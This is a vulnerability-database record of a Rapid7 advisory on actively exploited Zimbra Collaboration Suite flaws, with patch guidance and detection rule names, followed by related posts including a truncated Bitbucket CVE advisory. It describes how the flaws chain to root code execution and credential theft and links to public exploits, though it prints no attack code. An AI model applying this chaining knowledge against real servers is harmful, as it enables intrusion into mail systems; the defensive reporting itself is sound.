DATABASE RESOURCES PRICING ABOUT US

{"id": "RAPID7BLOG:B294A0F514563C5FBF86F841910C60BE", "vendorId": null, "type": "rapid7blog", "bulletinFamily": "info", "title": "Active Exploitation of Multiple Vulnerabilities in Zimbra Collaboration Suite", "description": "\n\nOver the past few weeks, five different vulnerabilities affecting [Zimbra Collaboration Suite](<https://www.zimbra.com/>) have come to our attention, one of which is unpatched, and four of which are being actively and widely exploited in the wild by well-organized threat actors. We urge organizations who use Zimbra to patch to the **[latest version](<https://wiki.zimbra.com/wiki/Zimbra_Releases>)** on an urgent basis, and to upgrade future versions as quickly as possible once they are released.\n\n## Exploited RCE vulnerabilities\n\nThe following vulnerabilities can be used for remote code execution and are being [exploited in the wild](<https://www.cisa.gov/uscert/ncas/alerts/aa22-228a>).\n\n### CVE-2022-30333\n\n[CVE-2022-30333](<https://nvd.nist.gov/vuln/detail/CVE-2022-30333>) is a path traversal vulnerability in `unRAR`, Rarlab\u2019s command line utility for extracting RAR file archives. CVE-2022-30333 allows an attacker to write a file anywhere on the target file system as the user that executes `unrar`. Zimbra Collaboration Suite uses a vulnerable implementation of `unrar` (specifically, the `amavisd` component, which is used to inspect incoming emails for spam and malware). Zimbra addressed this issue in [9.0.0 patch 25](<https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P25>) and [8.5.15 patch 32](<https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P32>) by replacing `unrar` with `7z`.\n\nOur research team has a [full analysis of CVE-2022-30333](<https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis?referrer=blog>) in AttackerKB. A [Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/16796>) is also available. Note that the server **does not** necessarily need to be internet-facing to be exploited \u2014 it simply needs to receive a malicious email.\n\n### CVE-2022-27924\n\nCVE-2022-27924 is a blind Memcached injection vulnerability [first analyzed publicly](<https://blog.sonarsource.com/zimbra-mail-stealing-clear-text-credentials-via-memcache-injection/>) in June 2022. Successful exploitation allows an attacker to change arbitrary keys in the Memcached cache to arbitrary values. In the worst-case scenario, an attacker can steal a user\u2019s credentials when a user attempts to authenticate. Combined with [CVE-2022-27925](<https://nvd.nist.gov/vuln/detail/CVE-2022-27925>), an authenticated remote code execution vulnerability, and [CVE-2022-37393](<https://attackerkb.com/topics/92AeLOE1M1/cve-2022-37393/rapid7-analysis?referrer=blog>), a currently unpatched privilege escalation issue that was publicly disclosed [in October 2021](<https://darrenmartyn.ie/2021/10/27/zimbra-zmslapd-local-root-exploit/>), capturing a user\u2019s password can lead to remote code execution as the root user on an organization\u2019s email server, which frequently contains sensitive data.\n\nOur research team has a [full analysis of CVE-2022-27924](<https://attackerkb.com/topics/6vZw1iqYRY/cve-2022-27924/rapid7-analysis?referrer=blog>) in AttackerKB. Note that an attacker does need to know a username on the server in order to exploit CVE-2022-27924. According to Sonar, it is also possible to poison the cache for _any_ user by stacking multiple requests.\n\n### CVE-2022-27925\n\n[CVE-2022-27925](<https://nvd.nist.gov/vuln/detail/CVE-2022-27925>) is a directory traversal vulnerability in Zimbra Collaboration Suite Network Edition versions 8.8.15 and 9.0 that allows an authenticated user with administrator rights to upload arbitrary files to the system. (Note that Open Source Edition does not have that endpoint and is therefore not vulnerable.) On August 10, 2022, security firm [Volexity published findings](<https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/>) from multiple customer compromise investigations that indicated CVE-2022-27925 was being exploited in combination with a zero-day authentication bypass, now assigned CVE-2022-37042, that allowed attackers to leverage CVE-2022-27925 _without_ authentication.\n\n**Note:** Although the public advisories don't mention it, our testing indicated that Zimbra Collaboration Suite Network Edition (the paid edition) is vulnerable, and the Open Source Edition (free) is not (since it does not have the vulnerable `mboximport` endpoint). Vulnerable versions are:\n\n * Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier)\n * Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier)\n\nOur research team has a [full analysis of CVE-2022-27925](<https://attackerkb.com/topics/dSu4KGZiFd/cve-2022-27925/rapid7-analysis>) in AttackerKB.\n\n### CVE-2022-37042\n\nAs noted above, CVE-2022-37042 is a critical authentication bypass that arises from an incomplete fix for CVE-2022-27925. Zimbra patched CVE-2022-37042 in [9.0.0P26](<https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P26>) and [8.8.15P33](<https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P33>).\n\n## Unpatched privilege escalation CVE-2022-37393\n\nIn October of 2021, researcher Darren Martyn [published an exploit](<https://github.com/darrenmartyn/zimbra-slapper/>) for a zero-day [root privilege escalation vulnerability](<https://darrenmartyn.ie/2021/10/27/zimbra-zmslapd-local-root-exploit/>) in Zimbra Collaboration Suite. When successfully exploited, the vulnerability allows a user with a shell account as the `zimbra` user to escalate to root privileges. While this issue requires a local account on the Zimbra host, the previously mentioned vulnerabilities in this blog post offer plenty of opportunity to obtain it.\n\nOur research team tested the privilege escalation in combination with CVE-2022-30333 at the end of July 2022, as well as the fully patched version on August 17, 2022, and found that all versions of Zimbra were affected through at least 9.0.0 P26 and 8.8.15 P33. Rapid7 disclosed the vulnerability to Zimbra on July 21, 2022 and later assigned [CVE-2022-37393](<https://nvd.nist.gov/vuln/detail/CVE-2022-37393>) (still awaiting NVD analysis) to track it. A [full analysis of CVE-2022-37393](<https://attackerkb.com/topics/92AeLOE1M1/cve-2022-37393/rapid7-analysis?referrer=blog>) is available in AttackerKB. A [Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/16807>) is also available.\n\n## Mitigation guidance\n\nWe strongly advise that all organizations who use Zimbra in their environments update to the latest available version (at time of writing, the latest versions available are 9.0.0 P26 and 8.8.15 P33) to remediate known remote code execution vectors. We also advise monitoring [Zimbra\u2019s release communications](<https://wiki.zimbra.com/wiki/Zimbra_Releases>) for future security updates, and patching on an urgent basis when new versions become available.\n\nThe AttackerKB analyses for [CVE-2022-30333](<https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis?referrer=blog>), [CVE-2022-27924](<https://attackerkb.com/topics/6vZw1iqYRY/cve-2022-27924/rapid7-analysis?referrer=blog>), [CVE-2022-27925](<https://attackerkb.com/topics/dSu4KGZiFd/cve-2022-27925/rapid7-analysis>), and [CVE-2022-37393](<https://attackerkb.com/topics/92AeLOE1M1/cve-2022-37393/rapid7-analysis?referrer=blog>) all include vulnerability details (including proofs of concept) and sample indicators of compromise (IOCs). Volexity\u2019s [blog](<https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/>) also has information on how to look for webshells dropped on Zimbra instances, such as comparing the list of JSP files on a Zimbra instance with those present by default in Zimbra installations. They have published [lists of valid JSP files included in Zimbra installations](<https://github.com/volexity/threat-intel/tree/main/2022/2022-08-10%20Mass%20exploitation%20of%20\\(Un\\)authenticated%20Zimbra%20RCE%20CVE-2022-27925>) for the latest version of 8.8.15 and of 9.0.0 (at time of writing).\n\nFinally, we recommend blocking internet traffic to Zimbra servers wherever possible and [configuring Zimbra to block external Memcached](<https://wiki.zimbra.com/wiki/Blocking_Memcached_Attack>), even on patched versions of Zimbra.\n\n## Rapid7 customers\n\nVulnerability checks for all five Zimbra CVEs are available via a content-only update as of August 18, 3pm ET.\n\n**InsightIDR:** Customers should look for alerts generated by InsightIDR\u2019s built-in detection rules from systems monitored by the Insight Agent. Alerts generated by the following rules may be indicative of related malicious activity:\n\n * Suspicious Process - Zimbra Collaboration Suite Webserver Spawns Script Interpreter\n * Suspicious Process - \u201cZimbra\u201d User Runs Shell or Script Interpreter\n\nThe Rapid7 MDR (Managed Detection &amp; Response) SOC is monitoring for this activity and will escalate confirmed malicious activity to managed customers immediately.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe\n\n \n\n\n_**Additional reading:**_\n\n * _[Active Exploitation of Atlassian\u2019s Questions for Confluence App CVE-2022-26138](<https://www.rapid7.com/blog/post/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/>)_\n * _[Exploitation of Mitel MiVoice Connect SA CVE-2022-29499](<https://www.rapid7.com/blog/post/2022/07/07/exploitation-of-mitel-mivoice-connect-sa-cve-2022-29499/>)_\n * _[CVE-2022-27511: Citrix ADM Remote Device Takeover](<https://www.rapid7.com/blog/post/2022/06/16/cve-2022-27511-citrix-adm-remote-device-takeover/>)_\n * _[Active Exploitation of Confluence CVE-2022-26134](<https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/>)_", "published": "2022-08-17T12:55:18", "modified": "2022-08-17T12:55:18", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://blog.rapid7.com/2022/08/17/active-exploitation-of-multiple-vulnerabilities-in-zimbra-collaboration-suite/", "reporter": "Caitlin Condon", "references": [], "cvelist": ["CVE-2022-26134", "CVE-2022-26138", "CVE-2022-27511", "CVE-2022-27924", "CVE-2022-27925", "CVE-2022-29499", "CVE-2022-30333", "CVE-2022-37042", "CVE-2022-37393"], "immutableFields": [], "lastseen": "2022-08-26T21:03:28", "viewCount": 1733, "enchantments": {"dependencies": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:4A411E7E1CF65A8662ABD43534726FEF", "AKAMAIBLOG:99D943E3269E3EABFC3348509D099BA8"]}, {"type": "atlassian", "idList": ["CONFSERVER-79000", "CONFSERVER-79016", "CONFSERVER-79483"]}, {"type": "attackerkb", "idList": ["AKB:042573E7-4FF2-4D52-842B-E72379F0C4D0", "AKB:48EF6C32-59B4-4AD7-BE9A-0EE8A2E86072", "AKB:519DD30E-F9A7-4A5E-A57B-DF4E4B9B20F1", "AKB:8049CCA9-ACA9-4288-8493-4153794BD621", "AKB:812ED357-C31F-4733-AFDA-96FACDD8A486", "AKB:9CE495DA-1E3B-4486-85DA-2F4FAB15E355", "AKB:C83F5B74-AC72-42D5-A71F-C8F4144C4C9D", "AKB:EFC2EE2A-9172-4B00-94C9-6CC133BD4B05"]}, {"type": "avleonov", "idList": ["AVLEONOV:4E65E4AC928647D5E246B06B953BBC6F", "AVLEONOV:E820C062BC9959711E1D1152D8848072"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2022-0297", "CPAI-2022-0331", "CPAI-2022-0357", "CPAI-2022-0467", "CPAI-2022-0515"]}, {"type": "cisa", "idList": ["CISA:695499EEB6D0CB5B73EEE7BCED9FD497", "CISA:71FB648030101FA9B007125DFA636193", "CISA:9E73FFA29BFAFFF667AC400A87F5434E", "CISA:B99FA8E68B4D7FF5BA1F6693AC9C7CCF"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2022-26134", "CISA-KEV-CVE-2022-26138", "CISA-KEV-CVE-2022-27924", "CISA-KEV-CVE-2022-27925", "CISA-KEV-CVE-2022-29499", "CISA-KEV-CVE-2022-30333", "CISA-KEV-CVE-2022-37042"]}, {"type": "citrix", "idList": ["CTX460016"]}, {"type": "cve", "idList": ["CVE-2022-26134", "CVE-2022-26138", "CVE-2022-27511", "CVE-2022-27924", "CVE-2022-27925", "CVE-2022-29499", "CVE-2022-30333", "CVE-2022-37042", "CVE-2022-37393"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2022-30333"]}, {"type": "exploitdb", "idList": ["EDB-ID:50952"]}, {"type": "githubexploit", "idList": ["02241D2D-F86F-5FE5-95FD-6978A07FE7FA", "09477170-A03D-5C2D-AC41-0D0A8F51EDB3", "0989C9B1-62A8-505A-B12F-586D7FAADEEE", "098B066E-24CE-5910-B91F-4A11E2A94063", "0E5BE237-A243-54B8-9AD7-92FBA10D1FA2", "11DEDDB4-6148-5800-86D0-BF20A0453109", "120220D8-2281-57EE-BD84-1A33B8841E56", "12691014-3333-5741-80A4-3357BD72D2AC", "18A205C9-C2EE-55CC-9BFD-4054390F94E9", "1A808CE9-B43C-50A7-A06E-75B3C5A7D5AC", "1F9C946C-1533-5835-B5E8-641EF4FFC145", "20BFC1D4-CB1E-51CF-82D8-E4258142BB69", "228C8A28-3BE8-51C1-A7B0-993047B4EC76", "2444574D-533F-593F-8E0E-68EA2B47EF55", "26F41B84-2AAF-5C6C-BE06-461FF65C6D03", "28E888C4-78E3-5F8D-B316-AB42FED892F9", "2A83DE3B-242D-51BE-84C8-5EB39AE1800E", "2AB84274-77B4-5551-8047-C6DEE2425EFF", "2B2A8A69-A893-5E85-8B02-6D8A77B54853", "2D36D631-FAE1-5508-9C60-F4B807EC6C47", "305ADB34-3669-5AAD-8D51-FCFFEF9E3F47", "34793974-B475-5BC4-BAAA-64FE57D0B3D9", "35830627-EBEC-59C8-A142-2F06CCF8EA5B", "3CD4239D-A6D3-5B3A-A18E-D5B99C51B5E5", "3F29DC5F-237B-53EB-B173-8F4751FE66A7", "423DF4D5-60AF-5663-B196-2A67DD13D226", "46787A11-B7F1-54E3-A965-2AEFCD29DB29", "469B060E-C585-599E-A0D1-AD5D186F70FD", "4D37AF88-23E8-5A3B-B559-7807CB07DB09", "4E2B73A6-1A0A-5AE6-A7D0-44663A8164FC", "5255E938-0B92-5E2C-B1A4-21B2445C29AF", "53CC55D8-983C-5FA9-AE81-D20750A6612E", "54DD3775-9F3C-54DF-93EF-372304E8EE4B", "65AEB692-CDF9-53FB-B13F-CAB5A4288606", "66468422-89C0-5AC8-9CEA-6B512338FF7C", "796BB1A4-EF64-57CA-862E-996A72F2FBE5", "7BE60530-0495-5366-846A-73B1A778DBDA", "83B145E2-F995-5B1C-863E-164839ED1173", "8F6AEAF4-2161-55F7-96CB-003251BDC309", "94DD467E-7BFF-5F8A-810C-3B1BDD195F6A", "A573E62D-1BE0-5CD3-8E6D-EB184127464A", "AB8EAC0D-269A-5799-885F-B0EA2A33792C", "B47171B0-339A-582E-8AAC-3B18373664B7", "BAEE7CC9-E997-5B82-A169-AB56B635CC1D", "C6912636-2CB2-54CA-9F78-1A4FF04CA119", "C8C50EDF-39F5-5103-AC79-A8C7FA6A4B60", "C9B0311C-F06D-5438-B36E-36DCE5FE691D", "D22CFFB0-30A6-5227-8048-C9C028070BD3", "DBAD59E8-9E48-5D54-92A0-AAD5B57C39F6", "E443E98A-3304-54B8-97FD-0FEF9DA283B3", "EA88FA45-8CE7-5D7D-8E6C-B04F8392F7EB", "F0CF90CD-DC6E-5F0F-AD61-5E1694700F32", "F42BF447-C1A3-5795-8343-D71F096AFF52", "F8CD1EFD-78D9-5506-9555-5A12EFB752AB", "FD4859A0-D69F-503C-BFDB-0C9025BDC68F"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:3B4F7E79DDCD0AFF3B9BB86429182DCA"]}, {"type": "hivepro", "idList": ["HIVEPRO:9ED83031EC50C160D6AC7D3000DBABA2", "HIVEPRO:D92A8F5DF20362E41FF86142A0BECE42"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:0BD55CF3ADC4FC18663ADAF4AE9272D2", "IMPERVABLOG:F193BFA34E9266EE9047B9FAB1A3A1B5"]}, {"type": "kitploit", "idList": ["KITPLOIT:3043339745958474082"]}, {"type": "mageia", "idList": ["MGASA-2022-0206"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:4E1B9086679032E60157678F3E82229D", "MALWAREBYTES:CA300551E02DA3FFA4255FBA0359A555", "MALWAREBYTES:FD1933FDD45B339A42C8A69C46589A0D"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-MULTI-HTTP-ATLASSIAN_CONFLUENCE_NAMESPACE_OGNL_INJECTION-"]}, {"type": "nessus", "idList": ["CITRIX_ADM_CTX460016.NASL", "CONFLUENCE_CONFSERVER-79483.NASL", "CONFLUENCE_CVE-2022-26134_REMOTE.NASL", "CONFLUENCE_CVE-2022-26138.NASL", "CONFLUENCE_CVE_2022_26134.NBIN", "SUSE_SU-2022-1760-1.NASL", "WEB_APPLICATION_SCANNING_113248", "WEB_APPLICATION_SCANNING_113311", "WEB_APPLICATION_SCANNING_113328", "ZIMBRA_9_0_0_P24.NASL", "ZIMBRA_9_0_0_P26.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:167430", "PACKETSTORM:167449", "PACKETSTORM:167989", "PACKETSTORM:168048", "PACKETSTORM:168146"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:027905A1E6C979D272DF11DDA2FC9F8F", "QUALYSBLOG:AC756D2C7DB65BB8BC9FBD558B7F3AD3", "QUALYSBLOG:F9C2629D40A6DC7640DB3D6BD4FB60B3"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:396ACAA896DDC62391C1F6CBEDA04085", "RAPID7BLOG:84EC5F57BD07F535627F51F28B2424B1", "RAPID7BLOG:AF9402873FB7ED43C52806FDEB7BC6DD", "RAPID7BLOG:C3FB7B0BA665AC291B6331292F32F47A", "RAPID7BLOG:C45DEEA0736048FF17FF9A53E337C92D", "RAPID7BLOG:F35EA4220CACE146EF8E5F845F2B51BF"]}, {"type": "talosblog", "idList": ["TALOSBLOG:1CC8B88D18FD4407B2AEF8B648A80C27"]}, {"type": "thn", "idList": ["THN:0488E447E08622B0366A0332F848212D", "THN:1E1F3CC9BEE728A9F18B223FC131E9B1", "THN:362401076AC227D49D729838DBDC2052", "THN:3B20D0D7B85F37BBDF8986CC9555A7A4", "THN:4376782A3F009FEED68FDD2022A11EF5", "THN:49CD77302B5D845459BA34357D9C011C", "THN:573D61ED9CCFF01AECC281F8913E42F8", "THN:7657424EABF9BB266876E3BD437269F4", "THN:76E9C775EE4ECFF3F3F1E02BCA0BE2F2", "THN:86F6539B2FD5CE0DEC7585157E18CBEF", "THN:908A39F901145B6FD175B16E95137ACC", "THN:A48A11A9708B43B68518F6625F1C0CB8", "THN:DE707FE81271E115F82D9DA443CC56C8", "THN:EAE0157F6308D86DB939FA200A017132", "THN:EAFAEB28A545DC638924DAC8AAA4FBF2", "THN:F0450E1253FFE5CA527F039D3B3A72BD", "THN:F050B7CE35D52E330ED83AACF83D6B29"]}, {"type": "threatpost", "idList": ["THREATPOST:22B3A2B9FF46B2AE65C74DA2E505A47E", "THREATPOST:7F03D6D7702417D24F26A06CBC31EE83", "THREATPOST:8C179A769DB315AF46676A862FC3D942"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2022-26134", "UB:CVE-2022-30333"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:E69ED97E0B27F68EA2CE3BB7BA9FE681"]}, {"type": "zdt", "idList": ["1337DAY-ID-37778", "1337DAY-ID-37781", "1337DAY-ID-37783", "1337DAY-ID-37894", "1337DAY-ID-37907", "1337DAY-ID-37925"]}]}, "score": {"value": 0.2, "vector": "NONE"}, "epss": [{"cve": "CVE-2022-26134", "epss": "0.975420000", "percentile": "0.999870000", "modified": "2023-03-19"}, {"cve": "CVE-2022-26138", "epss": "0.973890000", "percentile": "0.998230000", "modified": "2023-03-19"}, {"cve": "CVE-2022-27511", "epss": "0.001320000", "percentile": "0.464310000", "modified": "2023-03-19"}, {"cve": "CVE-2022-27924", "epss": "0.262330000", "percentile": "0.959750000", "modified": "2023-03-19"}, {"cve": "CVE-2022-27925", "epss": "0.970410000", "percentile": "0.995590000", "modified": "2023-03-19"}, {"cve": "CVE-2022-29499", "epss": "0.016040000", "percentile": "0.854240000", "modified": "2023-03-19"}, {"cve": "CVE-2022-30333", "epss": "0.854870000", "percentile": "0.979340000", "modified": "2023-03-19"}, {"cve": "CVE-2022-37042", "epss": "0.974850000", "percentile": "0.999400000", "modified": "2023-03-19"}, {"cve": "CVE-2022-37393", "epss": "0.000530000", "percentile": "0.188290000", "modified": "2023-03-19"}], "vulnersScore": 0.2}, "_state": {"dependencies": 1661548274, "score": 1684014897, "epss": 1679303669}, "_internal": {"score_hash": "ec8894246b05421898a3cac444cb06d9"}}

{"rapid7blog": [{"lastseen": "2022-09-28T15:43:01", "description": "\n\nAnother quarter comes to a close! While we definitely had our share of summer fun, our team continued to invest in the product, releasing features and updates like recurring coverage for enterprise technologies, performance enhancements, and more. Let\u2019s take a look at some of the key releases in [InsightVM](<https://www.rapid7.com/products/insightvm/>) and [Nexpose](<https://www.rapid7.com/products/nexpose/>) from Q3. \n\n## [[InsightVM](<https://docs.rapid7.com/insightvm/recurring-vulnerability-coverage/>) and [Nexpose](<https://docs.rapid7.com/nexpose/recurring-vulnerability-coverage/>)] Recurring coverage for VMware vCenter\n\nRecurring coverage provides ongoing, automatic vulnerability coverage for popular enterprise technology and systems. We recently added VMware vCenter to our list.\n\nVMware vCenter Server is a centralized management platform used to manage virtual machines, ESXi hosts, and dependent components from a single host. Last year, vCenter was a significant target for bad actors and became the subject of a [number](<https://www.rapid7.com/blog/post/2021/02/24/vmware-vcenter-server-cve-2021-21972-remote-code-execution-vulnerability-what-you-need-to-know/>) [of](<https://www.rapid7.com/blog/post/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/>) zero-days. Rapid7 provided ad hoc coverage to protect you against the vulnerabilities. Now, recurring coverage ensures fast, comprehensive protection that provides offensive and defensive security against vCenter vulnerabilities as they arise.\n\n## [InsightVM and Nexpose] Tune Assistant\n\nThe Security Console in InsightVM and Nexpose contains components that benefit from performance tuning. Tune Assistant is a built-in feature that will calculate performance tuning values based on resources allocated to the Security Console server, then automatically apply those values.\n\nTuning is calculated and applied to all new consoles when the product first starts up, and customers experiencing performance issues on existing consoles can now easily increase their own resources. For more information, read our [docs page](<https://docs.rapid7.com/insightvm/configuring-maximum-performance-in-an-enterprise-environment/>) on configuring maximum performance in an enterprise environment.\n\n\n\n## [InsightVM and Nexpose] Windows Server 2022 Support\n\nWe want to ensure InsightVM and Nexpose are supported on business-critical technologies and operating systems. We added Windows Server 2022, the latest operating system for servers from Microsoft, to our list. The Scan Engine and Security Console can be installed and will be supported by Rapid7 on Windows Server 2022. [Learn more](<https://www.rapid7.com/products/insightvm/system-requirements/>) about the systems we support. \n\n## [InsightVM and Nexpose] Checks for notable vulnerabilities\n\nWith exploitation of major vulnerabilities in [Mitel MiVoice Connect](<https://www.rapid7.com/blog/post/2022/07/07/exploitation-of-mitel-mivoice-connect-sa-cve-2022-29499/>), multiple [Confluence](<https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/>) [applications](<https://www.rapid7.com/blog/post/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/>), and [other](<https://www.rapid7.com/blog/post/2022/06/16/cve-2022-27511-citrix-adm-remote-device-takeover/>) [popular](<https://www.rapid7.com/blog/post/2022/08/17/active-exploitation-of-multiple-vulnerabilities-in-zimbra-collaboration-suite/>) [solutions](<https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/>), the threat actors definitely did not take it easy this summer. InsightVM and Nexpose customers can assess their exposure to many of these CVEs for vulnerability checks, including:\n\n * **Mitel MiVoice Connect Service Appliance | CVE-2022-29499:** An onsite VoIP business phone system, MiVoice Connect had a data validation vulnerability, which arose from insufficient data validation for a diagnostic script. The vulnerability potentially allowed an unauthenticated remote attacker to send specially crafted requests to inject commands and achieve remote code execution. [Learn more about the vulnerability and our response](<https://www.rapid7.com/blog/post/2022/07/07/exploitation-of-mitel-mivoice-connect-sa-cve-2022-29499/>).\n * **\u201cQuestions\u201d add-on for Confluence Application | CVE-2022-26138:** This vulnerability affected \u201cQuestions,\u201d an add-on for the Confluence application. It was quickly exploited in the wild once the hardcoded password was released on social media. [Learn more about the vulnerability and our response](<https://www.rapid7.com/blog/post/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/>).\n * **Multiple vulnerabilities in Zimbra Collaboration Suite:** Zimbra, a business productivity suite, was affected by five different vulnerabilities, one of which was unpatched, and four of which were being actively and widely exploited in the wild by well-organized threat actors. [Learn more about the vulnerability and our response](<https://www.rapid7.com/blog/post/2022/08/17/active-exploitation-of-multiple-vulnerabilities-in-zimbra-collaboration-suite/>).\n * **CVE-2022-30333**\n * **CVE-2022-27924**\n * **CVE-2022-27925**\n * **CVE-2022-37042**\n * **CVE-2022-37393**\n\nWe were hard at work this summer making improvements and increasing the level of protections against attackers for our customers. As we head into the fall and the fourth quarter of the year, you can bet we will continue to make InsightVM the best and most comprehensive risk management platform available. Stay tuned for more great things, and have a happy autumn.\n\n_**Additional reading:**_\n\n * _[The 2022 SANS Top New Attacks and Threats Report Is In, and It's Required Reading](<https://www.rapid7.com/blog/post/2022/09/14/the-2022-sans-top-new-attacks-and-threats-report-is-in-and-its-required-reading/>)_\n * _[InsightVM: Best Practices to Improve Your Console](<https://www.rapid7.com/blog/post/2022/09/12/insightvm-best-practices-to-improve-your-console/>)_\n * _[5 Steps for Dealing With Unknown Environments in InsightVM](<https://www.rapid7.com/blog/post/2022/09/06/5-steps-for-dealing-with-unknown-environments-in-insightvm/>)_\n * _[What\u2019s New in InsightVM and Nexpose: Q2 2022 in Review](<https://www.rapid7.com/blog/post/2022/07/28/whats-new-in-insightvm-and-nexpose-q2-2022-in-review/>)_[ \n](<https://www.rapid7.com/blog/post/2022/07/28/whats-new-in-insightvm-and-nexpose-q2-2022-in-review/>)\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-28T14:11:35", "type": "rapid7blog", "title": "What\u2019s New in InsightVM and Nexpose: Q3 2022 in Review", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "CVE-2021-22005", "CVE-2022-26134", "CVE-2022-26138", "CVE-2022-27511", "CVE-2022-27924", "CVE-2022-27925", "CVE-2022-29499", "CVE-2022-30333", "CVE-2022-36804", "CVE-2022-37042", "CVE-2022-37393"], "modified": "2022-09-28T14:11:35", "id": "RAPID7BLOG:619370773CDB77FA0DBA52EC74E4B159", "href": "https://blog.rapid7.com/2022/09/28/whats-new-in-insightvm-and-nexpose-q3-2022-in-review/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-26T16:04:26", "description": "\n\nOn August 24, 2022, Atlassian published [an advisory for Bitbucket Server and Data Center](<https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html>) alerting users to [CVE-2022-36804](<https://attackerkb.com/topics/iJIxJ6JUow/cve-2022-36804/rapid7-analysis/?utm_source=rapid7-blog&utm_medium=referral&utm_campaign=etr-atlassian-bitbucket>). The advisory reveals a command injection vulnerability in multiple API endpoints, which allows an attacker with access to a public repository or with **read permissions** to a private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request. CVE-2022-36804 carries a CVSSv3 score of 9.8 and is easily exploitable. Rapid7\u2019s vulnerability research team has a [full technical analysis in AttackerKB](<https://attackerkb.com/topics/iJIxJ6JUow/cve-2022-36804/rapid7-analysis/?utm_source=rapid7-blog&utm_medium=referral&utm_campaign=etr-atlassian-bitbucket>), including how to use CVE-2022-36804 to create a simple reverse shell.\n\n[According to Shodan](<https://www.shodan.io/search?query=http.component%3A%22atlassian+bitbucket%22>), there are about 1,400 internet-facing servers, but it\u2019s not immediately obvious how many have a public repository. There are no public reports of exploitation in the wild as of September 20, 2022 (edit: see note below), but there has been strong interest in the vulnerability from researchers and exploit brokers, and there are now multiple public exploits available. Because the vulnerability is trivially exploitable and the patch is relatively simple to reverse- engineer, it\u2019s likely that targeted exploitation has already occurred in the wild. We expect to see larger-scale exploitation of CVE-2022-36804 soon.\n\n**Note:** Several threat intelligence sources [reported](<https://twitter.com/Shadowserver/status/1573300004072132608>) seeing exploitation attempts in the wild as of September 23, 2022.\n\n**Affected products:** \nBitbucket Server and Data Center 7.6 